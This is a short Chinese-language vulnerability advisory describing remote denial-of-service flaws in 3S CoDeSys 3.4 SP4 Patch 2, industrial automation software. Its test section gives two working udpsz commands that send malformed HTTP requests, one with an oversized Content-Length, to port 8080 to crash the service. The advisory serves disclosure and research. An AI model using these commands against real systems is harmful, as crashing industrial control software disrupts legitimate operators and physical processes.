发布日期:2011-11-30
更新日期:2011-12-05
受影响系统:
3S GmbH CoDeSys 3.4 SP4 Patch 2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 50854
CoDeSys Automation Suite是工业自动化技术综合软件工具。
CoDeSys在实现上存在多个远程拒绝服务漏洞,远程攻击者可利用此漏洞使应用程序崩溃,拒绝服务合法用户。
<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1
udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1
建议:
--------------------------------------------------------------------------------
厂商补丁:
3S
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: